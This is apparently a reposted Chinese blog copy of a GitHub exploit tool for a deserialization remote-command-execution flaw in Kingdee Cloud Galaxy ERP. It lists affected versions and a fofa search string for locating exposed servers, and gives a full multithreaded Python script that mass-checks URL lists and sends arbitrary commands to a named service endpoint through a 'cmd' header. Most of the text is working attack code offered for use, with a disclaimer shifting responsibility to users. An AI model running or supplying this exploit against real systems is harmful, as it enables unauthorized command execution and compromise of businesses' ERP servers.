金蝶云星空 Kingdee-erp-Unserialize-RCE
由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包含恶意代码的序列化数据,达到在服务端远程命令执行的效果。该漏洞不仅存在于金蝶云星空管理中心(默认8000端口),普通应用(默认80端口)也存在类似问题。
影响范围:
6.x版本:低于6.2.1012.4
7.x版本:7.0.352.16 至 7.7.0.202111
8.x版本:8.0.0.202205 至 8.1.0.20221110
Usage
usage: Kingdee-erp-Unserialize-RCE.py [-h] [-u URL] [--check] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT]
[-p PROXY] [--cmd CMD]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Target url(e.g. http://127.0.0.1)
--check Check if vulnerable
-f FILE, --file FILE Target file(e.g. url.txt)
-t THREAD, --thread THREAD
Number of thread (default 5)
-T TIMEOUT, --timeout TIMEOUT
Request timeout (default 3)
-o OUTPUT, --output OUTPUT
Vuln url output file (e.g. result.txt)
-p PROXY, --proxy PROXY
Request Proxy (e.g http://127.0.0.1:8080)
--cmd CMD execute cmd (e.g. whoami)
poc
python .\Kingdee-erp-Unserialize-RCE.py -f .\url.txt --check -t 10
exp
python .\Kingdee-erp-Unserialize-RCE.py -u http://host --cmd 'dir'
免责声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#fofa: app="金蝶云星空-管理中心"
import os
import time
from urllib import response
from urllib.parse import urljoin
from weakref import proxy
import requests
from threading import Lock
from concurrent.futures import ThreadPoolExecutor
from argparse import ArgumentParser
requests.packages.urllib3.disable_warnings()
class POC:
def __init__(self):
self.banner()
self.args = self.parseArgs()
if self.args.url:
if self.args.check:
self.verfyurl()
elif self.args.cmd:
self.verfyurl()
elif self.args.file:
self.init()
self.urlList = self.loadURL()
self.multiRun()
self.start = time.time()
def banner(self):
logo = r"""
_ ___ _ _____ _____ ______
| |/ (_) | | | __ \ / ____| ____|
| ' / _ _ __ __ _ __| | ___ ___ ______| |__) | | | |__
| < | | '_ \ / _` |/ _` |/ _ \/ _ \______| _ /| | | __|
| . \| | | | | (_| | (_| | __/ __/ | | \ \| |____| |____
|_|\_\_|_| |_|\__, |\__,_|\___|\___| |_| \_\\_____|______|
__/ |
|___/
author: Sweelg
GitHub: https://github.com/Sweelg
"""
print("\033[91m" + logo + "\033[0m")
def parseArgs(self):
date = time.strftime("%Y-%m-%d_%H-%M-%S", time.localtime())
parser = ArgumentParser()
parser.add_argument("-u", "--url", required=False, type=str, help="Target url(e.g. http://127.0.0.1)")
parser.add_argument("--check", required=-False, default=False, action='store_true', help="Check if vulnerable")
parser.add_argument("-f", "--file", required=False, type=str, help=f"Target file(e.g. url.txt)")
parser.add_argument("-t", "--thread", required=False, type=int, default=5, help=f"Number of thread (default 5)")
parser.add_argument("-T", "--timeout", required=False, type=int, default=3, help="Request timeout (default 3)")
parser.add_argument("-o", "--output", required=False, type=str, default=date, help=f"Vuln url output file (e.g. result.txt)")
parser.add_argument("-p", "--proxy", default=None, help="Request Proxy (e.g http://127.0.0.1:8080)")
parser.add_argument("--cmd", required=False, type=str, default='whoami', help="execute cmd (e.g. whoami)")
return parser.parse_args()
def init(self):
print("\nthread:", self.args.thread)
print("timeout:", self.args.timeout)
msg = ""
if os.path.isfile(self.args.file):
msg += "Load url file successfully\n"
else:
msg += f"\033[31mLoad url file {self.args.file} failed\033[0m\n"
print(msg)
if "failed" in msg:
print("Init failed, Please check the environment.")
os._exit(0)
print("Init successfully")
def respose(self, url):
proxy = self.args.proxy
command = self.args.cmd
proxies = None
if proxy:
proxies = {"http": proxy, "https": proxy}
path = "/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc"
url = urljoin(url, path)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
"Content-Type": "text/json",
"cmd": command
}
data = '''{
"ap0": "",
"format": "3"
}'''
try:
response = requests.post(url, headers=headers, data=data, proxies=proxies, timeout=self.args.timeout, verify=False)
resp = response.text
return resp
except:
return "conn"
def verfyurl(self):
url = self.args.url
repData = self.respose(url)
res = repData.split("response_error:")[0].strip()
if res :
print("[+] 漏洞存在!!![✅] url: {}\n{}".format(url, res))
elif "conn" in repData:
print("[-] URL连接失败! [-] url: {}".format(url))
else:
print("[x] 未检测到漏洞![x] url: {}".format(url))
def verify(self, url):
repData = self.respose(url)
if "authority\system" in repData:
msg = "[+] 漏洞存在!!![✅] url: {}".format(url)
self.lock.acquire()
try:
self.findCount +=1
self.vulnRULList.append(url)
finally:
self.lock.release()
elif "conn" in repData:
msg = "[-] URL连接失败! [-] url: {}".format(url)
else:
msg = "[x] 未检测到漏洞![x] url: {}".format(url)
self.lock.acquire()
try:
print(msg)
finally:
self.lock.release()
def loadURL(self):
urlList = []
with open(self.args.file, encoding="utf8") as f:
for u in f.readlines():
u = u.strip()
urlList.append(u)
return urlList
def multiRun(self):
self.findCount = 0
self.vulnRULList = []
self.lock = Lock()
executor = ThreadPoolExecutor(max_workers=self.args.thread)
executor.map(self.verify, self.urlList)
def output(self):
if not os.path.isdir(r"./output"):
os.mkdir(r"./output")
self.outputFile = f"./output/{self.args.output}.txt"
with open(self.outputFile, "a") as f:
for url in self.vulnRULList:
f.write(url + "\n")
def __del__(self):
try:
print("\nAlltCount:\033[31m%d\033[0m\nVulnCount:\033[32m%d\033[0m" % (len(self.urlList), self.findCount))
self.end = time.time()
print("Time Spent: %.2f" % (self.end - self.start))
self.output()
print("-" * 20, f"\nThe vulnURL has been saved in {self.outputFile}\n")
except:
pass
if __name__ == "__main__":
POC()
本文链接:https://www.kinber.cn/post/4713.html 转载需授权!
推荐本站淘宝优惠价购买喜欢的宝贝: